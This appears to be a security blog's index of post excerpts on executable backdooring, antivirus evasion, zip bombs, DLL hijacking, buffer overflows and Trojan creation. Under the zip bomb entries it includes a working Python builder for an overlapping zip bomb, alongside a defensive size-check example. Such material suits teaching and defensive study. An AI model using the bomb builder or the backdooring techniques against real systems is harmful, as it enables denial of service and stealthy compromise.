Post Exploitation Backdooring III

This is the third post in the series on post-exploitation backdooring based on code caves. In the first part I showed you how to create a basic code cave in an executable to introduce a shell. In the second part I lowered its detection rate by using natural code caves and hiding the jump to the cave among the program's own instructions. In this part I'm going to show you how to keep antivirus from detecting the shell inside the code cave by encrypting it and decrypting it at runtime. Thanks again to OscarAkaElvis, who taught me these techniques. Cipher natural code caves. This method builds on the previous one. Some antivirus…

0 Comments

Post Exploitation Backdooring II

This is the second part of the series of posts on Post Exploitation Backdooring. If you haven't read the previous post, I recommend you do so in order to follow this one. Again I want to thank OscarAkaElvis, who taught me these PE backdooring techniques. In the previous post we saw how to introduce the code of a reverse shell into a program, creating a Trojan. However, in real life this technique is well known to antivirus, and it will not work. First of all, because it is very rare for a program to have a JMP as its first instruction. On the other hand, it is easy to verify that the size…

2 Comments

Post Exploitation Backdooring I

A few months ago I attended a post-exploitation course taught by my former colleague OscarAkaElvis (creator of the wireless auditing tool Airgeddon, which I recommend you try). I also want to warn that this is an advanced technique and you need basic knowledge of assembly and reversing. If you don't have it, I recommend the Pentester Academy courses "x86 Assembly Language and Shellcoding on Linux" and "Reverse Engineering Win32 Applications". In this post I'm going to show you how to turn an exe into a Trojan by modifying its code to run a remote terminal. To do this we will start with the simplest way to do it, but also…

2 Comments

Zip Bombs III: Overlapping Bombs

In this last post of the zip bomb series, I'm going to tell you about a new method that has emerged in the last month: overlapping bombs. With this type of bomb the highest decompression ratio of all time has been achieved: from 46 MB to 4.5 petabytes. The idea. This kind of bomb, created by David Fifield, has something very different from those of the previous posts: it does not use recursion. Instead, it uses file overlapping. This means that it expands completely after the first decompression, so it cannot be stopped by the security measures taken by antivirus and operating systems with the…
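To make the overlap concrete, here is an added example in Python (constructed for this page, not David Fifield's or the post author's code). It writes a zip archive containing a single compressed "kernel" and a single local file header, then emits many central-directory records that all point at local-header offset 0, so every entry is backed by the same compressed bytes and the archive promises N times the kernel's size. It is a degenerate form of the published construction: the real bomb gives each entry its own name by quoting the next local header inside the deflate stream, which is not reproduced here. The entry name `0`, the kernel of zero bytes and the sizes are all assumptions chosen for the demonstration.

```python
"""Constructed example: an overlapping zip in which many central-directory
records point at one and the same local file header, so one compressed kernel
is counted (and extracted) once per entry. Not the post author's code."""
import io
import struct
import zipfile
import zlib
from typing import Tuple

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = 0x04034B50, 0x02014B50, 0x06054B50
DEFLATED = 8
DOS_DATE_1980 = 0x21  # 1980-01-01, the earliest date the zip format can express


def build_overlapping_zip(kernel: bytes, copies: int, name: bytes = b"0") -> bytes:
    """Return a zip archive with `copies` entries that all share one compressed body."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw deflate, as zip stores it
    body = comp.compress(kernel) + comp.flush()
    crc = zlib.crc32(kernel) & 0xFFFFFFFF
    # Exactly one local file header + compressed data goes into the archive.
    local = struct.pack("<IHHHHHIIIHH", LOCAL_SIG, 20, 0, DEFLATED, 0, DOS_DATE_1980,
                        crc, len(body), len(kernel), len(name), 0) + name + body
    # Every central-directory record claims local-header offset 0: that is the overlap.
    record = struct.pack("<IHHHHHHIIIHHHHHII", CENTRAL_SIG, 20, 20, 0, DEFLATED,
                         0, DOS_DATE_1980, crc, len(body), len(kernel),
                         len(name), 0, 0, 0, 0, 0, 0) + name
    central = record * copies
    eocd = struct.pack("<IHHHHIIH", EOCD_SIG, 0, 0, copies, copies,
                       len(central), len(local), 0)
    return local + central + eocd


def declared_uncompressed_size(archive: bytes) -> int:
    """Sum of the sizes the central directory promises (what an extractor would write)."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return sum(info.file_size for info in zf.infolist())


def inflate_entry(archive: bytes, header_offset: int) -> bytes:
    """Inflate one entry by hand, following its local file header."""
    hdr = struct.unpack_from("<IHHHHHIIIHH", archive, header_offset)
    if hdr[0] != LOCAL_SIG:
        raise ValueError("not a local file header")
    comp_size, name_len, extra_len = hdr[7], hdr[9], hdr[10]
    start = header_offset + 30 + name_len + extra_len
    return zlib.decompress(archive[start:start + comp_size], -15)


def bomb_stats(copies: int = 100, kernel_size: int = 1 << 20) -> Tuple[int, int, bool]:
    """Build a small bomb; return (archive bytes, promised bytes, first entry inflates to the kernel)."""
    kernel = b"\0" * kernel_size            # constructed, highly compressible payload
    archive = build_overlapping_zip(kernel, copies)
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        first = zf.infolist()[0]
    ok = inflate_entry(archive, first.header_offset) == kernel
    return len(archive), declared_uncompressed_size(archive), ok


if __name__ == "__main__":
    size, promised, ok = bomb_stats()
    print(f"{size} bytes on disk promise {promised} bytes ({promised // size}x); "
          f"first entry inflates correctly: {ok}")
```

With the defaults (a 1 MiB kernel and 100 records) the archive is a few kilobytes and promises 100 MiB; scaling `copies` and the kernel is what turns this into a real bomb, which is why the example reads the declared sizes from the central directory instead of extracting everything. Note that the 2024 zipfile hardening in CPython (the fix for CVE-2024-0450) makes `ZipFile.read()` refuse entries whose data overlaps another entry, so extracting these entries with the standard library now fails on patched interpreters; listing them, as above, still works.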

0 Comments

Zip Bombs II: Quine Bombs

In last week's post I introduced zip bombs and explained how to create one using the recursion technique. I recommend that you take a look at it if you haven't already done so. In this new entry I'm going to introduce Quine Bombs. Quine Programs. In computing, a "quine" is a program that replicates itself: in other words, a program whose source code produces its own source code as output. This is not easy to achieve. Let's see an example. If we execute print(1) in Python, the output would be 1. We need the output to be the same as the input, in this case…

1 Comment

Zip Bomb I: Nested bombs

When a file is compressed, its size is reduced. It's based on a simple principle: if you have a file with the text "aaaaaabbb", which is 9 characters long, you could reduce its size by saving it as "6a3b". Using this rudimentary algorithm, you decompress the file by repeating the character that follows each number as many times as the number indicates. That's why two files of the same size are compressed at different ratios. Following the previous example, the file "aaaaaabbb" becomes "6a3b", a compression ratio of 4:9, i.e. it is reduced by about 56%. However, the file "aaabbaaab" would become "3a2b3a1b",…
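The run-length scheme the post sketches, implemented as an added Python example (mine, not the post's code) so that the two cases above can be checked, and extended with the one thing a decompressor of any format needs against a bomb: computing the expanded size from the counts before allocating it. The digit-free input restriction and the 1 MiB expansion limit are assumptions of the example; the post's "6a3b" notation cannot encode digits unambiguously, so the encoder rejects them.

```python
"""Constructed example (not the post's code): the "6a3b" run-length scheme
described above, plus a size pre-check that bounds decompression."""
import itertools
import re

_TOKEN = re.compile(r"(\d+)(\D)")   # a count followed by the character it repeats


def rle_compress(text: str) -> str:
    """'aaaaaabbb' -> '6a3b'. Digits are rejected: '3a21' has no unique decoding."""
    if any(c.isdigit() for c in text):
        raise ValueError("input may not contain digits in this scheme")
    return "".join(f"{len(list(run))}{ch}" for ch, run in itertools.groupby(text))


def rle_expanded_size(compressed: str) -> int:
    """Size after decompression, computed from the counts alone, without expanding."""
    tokens = _TOKEN.findall(compressed)
    if "".join(n + c for n, c in tokens) != compressed:
        raise ValueError("malformed RLE stream")
    return sum(int(n) for n, _ in tokens)


def rle_decompress(compressed: str, limit: int = 1 << 20) -> str:
    """Inverse of rle_compress, refusing streams that would expand beyond `limit`."""
    size = rle_expanded_size(compressed)
    if size > limit:
        raise ValueError(f"refusing to expand {size} bytes (limit {limit})")
    return "".join(c * int(n) for n, c in _TOKEN.findall(compressed))


def compression_ratio(text: str) -> float:
    """compressed length / original length, e.g. 4/9 for 'aaaaaabbb'."""
    return len(rle_compress(text)) / len(text)


if __name__ == "__main__":
    for sample in ("aaaaaabbb", "aaabbaaab"):
        print(sample, "->", rle_compress(sample), f"ratio {compression_ratio(sample):.2f}")
    # An 11-character stream that promises a gigabyte: the bomb principle in miniature.
    print("1000000000a expands to", rle_expanded_size("1000000000a"), "bytes")
```

The `rle_expanded_size` check is the part worth keeping in mind for the rest of the series: every compressed format lets the producer state a huge output for a tiny input, and a decompressor that trusts that figure, or never looks at it, is the thing a zip bomb exploits.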

4 Comments

DLL Hijacking

Recently I have been doing some very interesting Pentester Academy courses. Thanks to them I am learning a lot, since they deal with very specific topics with clear examples. Today I am going to show you what I have learned about DLL Hijacking. A DLL is a dynamic-link library. There are two types of DLLs: system DLLs, which Windows itself provides, and application DLLs, into which the application developer divides its functionality. Executables use these DLLs because it makes the code modular and allows it to be reused. In this way, dependencies are created, and depending on the importance…

0 Comments

Buffer Overflow

In this post we will talk about how one of the oldest computer attacks occurs: the buffer overflow. A buffer overflow occurs when a program has reserved an amount of memory X for a variable, but at the time of assigning its value, the value is larger than X. If the program does not properly check how much data it copies, whatever does not fit in the reserved space is written into adjacent memory. A malicious user could use this in his favor to alter other variables whose assigned memory area is contiguous…

0 Comments

Malware PoC: How to do a Trojan Horse

We all know them. They plague our computers. But how is malware made? In general, talking about creating malware is rare in the cybersecurity field, because unless you are dedicated to stopping it, there is no ethical reason why you should know how to develop it. Or is there? After all, a hacker seeks to push what he has in his hands to the limit. Well, today we have a Trojan horse. Let's see how they work with a little PoC. But first let's review some important terms, so we don't get lost before we start. Terminology. Trojan: malicious software that looks like a harmless program. Modding: modify…

0 Comments